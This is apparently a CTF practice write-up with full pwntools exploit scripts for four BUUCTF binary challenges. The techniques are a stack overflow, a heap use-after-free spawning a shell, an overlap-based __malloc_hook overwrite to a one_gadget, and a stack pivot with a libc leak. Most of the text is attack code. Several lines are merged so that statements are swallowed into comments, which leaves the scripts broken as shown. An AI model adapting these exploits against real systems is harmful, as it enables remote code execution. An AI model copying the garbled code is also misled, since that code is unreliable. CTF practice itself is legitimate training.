PWN-PRACTICE-BUUCTF-14
- bbys_tu_2016
- ciscn_2019_n_3
- roarctf_2019_easy_pwn
- gyctf_2020_borrowstack
bbys_tu_2016
栈溢出，将返回地址（eip）覆盖为 printFlag 函数的地址
from pwn import *
# Local variant kept for reference; the script as written talks to the remote practice instance.
#io=process('./bbys_tu_2016')
io=remote('node4.buuoj.cn',27817)
elf=ELF('./bbys_tu_2016')
#io.recvuntil('feed it.\n')
# 24 filler bytes followed by one packed 32-bit address (0x0804856D, hard-coded for this binary).
# NOTE(review): 'a'*24 is str while p32() returns bytes under Python 3 pwntools, so this
# concatenation raises TypeError there — the script assumes Python 2; confirm the interpreter.
payload='a'*(24)+p32(0x0804856D)
io.sendline(payload)
io.interactive()
ciscn_2019_n_3
参考:[BUUCTF]PWN——ciscn_2019_n_3
from pwn import *
#context.log_level="debug"
# Remote practice instance; the commented-out process() line is the local variant.
io=remote("node4.buuoj.cn",29097)
#io=process("./ciscn_2019_n_3")
elf=ELF("./ciscn_2019_n_3")


def new(index,btype,cont,cont_len=0) -> None:
    """Drive menu option 1 of the service over the module-level ``io`` connection.

    Sends ``index`` and ``btype``; when ``btype`` is 1 only ``cont`` is sent as the
    value, otherwise ``cont_len`` is sent at the "Length > " prompt before ``cont``.
    Does not read or return anything beyond what ``sendlineafter`` consumes.
    """
    io.sendlineafter("CNote > ","1")
    io.sendlineafter("Index > ",str(index))
    if btype==1:
        io.sendlineafter("Type > ",str(btype))
        io.sendlineafter("Value > ",cont)
    else:
        io.sendlineafter("Type > ",str(btype))
        # Only the non-1 type path has a length prompt.
        io.sendlineafter("Length > ",str(cont_len))
        io.sendlineafter("Value > ",cont)
def delete(index) -> None:
    """Drive menu option 2 (delete) for ``index`` over the module-level ``io`` connection."""
    io.sendlineafter("CNote > ","2")
    io.sendlineafter("Index > ",str(index))
def show(index) -> None:
    """Drive menu option 3 (show) for ``index`` over the module-level ``io`` connection."""
    io.sendlineafter("CNote > ","3")
    io.sendlineafter("Index > ",str(index))
#gdb.attach(io)
#pause()new(0,1,"1")
new(1,1,"1")
new(2,1,"1")#pause()delete(0)
delete(1)#pause()system_plt=elf.plt["system"]
print(hex(system_plt))
payload="sh\x00\x00"+p32(system_plt)
new(3,2,payload,0xc)#pause()delete(0)io.interactive()
roarctf_2019_easy_pwn
参考:【pwn】roarctf_2019_easy_pwn
from pwn import *
#context.log_level="debug"
# Local variant kept for reference; the script as written talks to the remote practice instance.
#io=process("./roarctf_2019_easy_pwn")
io=remote("node4.buuoj.cn",28680)
elf=ELF("./roarctf_2019_easy_pwn")
# Every libc offset used below is resolved against, or hard-coded for, this exact libc file.
libc=ELF("./libc-2.23-16-x64.so")
def create(size) -> None:
    """Drive menu option 1 (create) with ``size`` over the module-level ``io`` connection."""
    io.sendlineafter("choice: ","1")
    io.sendlineafter("size: ",str(size))
def write(index,size,content) -> None:
    """Drive menu option 2 (write): send ``index``, ``size``, then ``content`` over the module-level ``io``.

    ``size`` is sent as given; nothing here checks it against the size the entry was created with.
    """
    io.sendlineafter("choice: ","2")
    io.sendlineafter("index: ",str(index))
    io.sendlineafter("size: ",str(size))
    io.sendlineafter("content: ",content)
def drop(index) -> None:
    """Drive menu option 3 (drop) for ``index`` over the module-level ``io`` connection."""
    io.sendlineafter("choice: ","3")
    io.sendlineafter("index: ",str(index))
def show(index) -> None:
    """Drive menu option 4 (show) for ``index`` over the module-level ``io`` connection."""
    io.sendlineafter("choice: ","4")
    io.sendlineafter("index: ",str(index))
#gdb.attach(io)
#pause()create(0x18)#chunk0
create(0x18)#chunk1
create(0x88)#chunk2
create(0x88)#chunk3
create(0x28)#chunk4
create(0x28)#chunk5
create(0x68)#chunk6#pause()write(0,0x18+10,"a"*0x18+p8(0xb1))
drop(1)#pause()create(0xa8)#chunk1
write(1,0x20,"a"*0x18+p64(0x91))#pause()drop(2)
show(1)
io.recvuntil("content: ")
io.recv(0x20)
libc_base=u64(io.recv(8))-0x3C4B78
print(hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
realloc=libc_base+libc.sym["__libc_realloc"]
libc_one_gadget=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libc_base+libc_one_gadget[1]#pause()write(4,0x28+10,"a"*0x28+p8(0xa1))
drop(5)
drop(6)#pause()create(0x98)#chunk2
payload="a"*0x28+p64(0x71)+p64(malloc_hook-0x23)
write(2,len(payload),payload)#pause()create(0x68)#chunk5
create(0x68)#chunk6
payload="a"*(0x13-8)+p64(one_gadget)+p64(realloc+0x10)
write(6,len(payload),payload)#pause()create(0x88)io.interactive()
gyctf_2020_borrowstack
栈迁移到 .bss 段
但要尽量往高地址处迁移，避免再次执行 main 函数时，局部临时变量占用的栈空间覆盖 GOT 表
from pwn import *
#context.log_level='debug'
# Local variant kept for reference; the script as written talks to the remote practice instance.
#io=process('./gyctf_2020_borrowstack')
io=remote('node4.buuoj.cn',25331)
elf=ELF('./gyctf_2020_borrowstack')
# Every libc offset below is resolved against, or hard-coded for, this exact libc file.
libc=ELF('./libc-2.23-x64.so')
# Fixed addresses taken from this specific (non-PIE) binary; they do not transfer to another build.
bank_addr=0x601080
leave_ret=0x400699
pop_rdi=0x400703
ret=0x4004c9
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.sym['main']
io.recvuntil('what you want\n')
# NOTE(review): 'a'*N is str while p64() returns bytes under Python 3 pwntools, so the
# payload concatenations (and ljust(8,'\x00') below) assume Python 2 — confirm the interpreter.
payload0='a'*(0x60)+p64(bank_addr)+p64(leave_ret)
io.send(payload0)
io.recvuntil('stack now!\n')
payload1=p64(ret)*20+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.send(payload1)
# Leak parsing: exactly 6 bytes are read and zero-padded to 8 before unpacking little-endian.
puts_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
# Candidate offsets hard-coded for libc-2.23-x64.so; index 1 is the one used.
ones=[0x45216,0x4526a,0xf02a4,0xf1147]
onegadget=libc_base+ones[1]
io.recvuntil('you want\n')
payload2='a'*(0x60+8)+p64(onegadget)
io.send(payload2)
io.recvuntil('stack now!')
io.send('1')
io.interactive()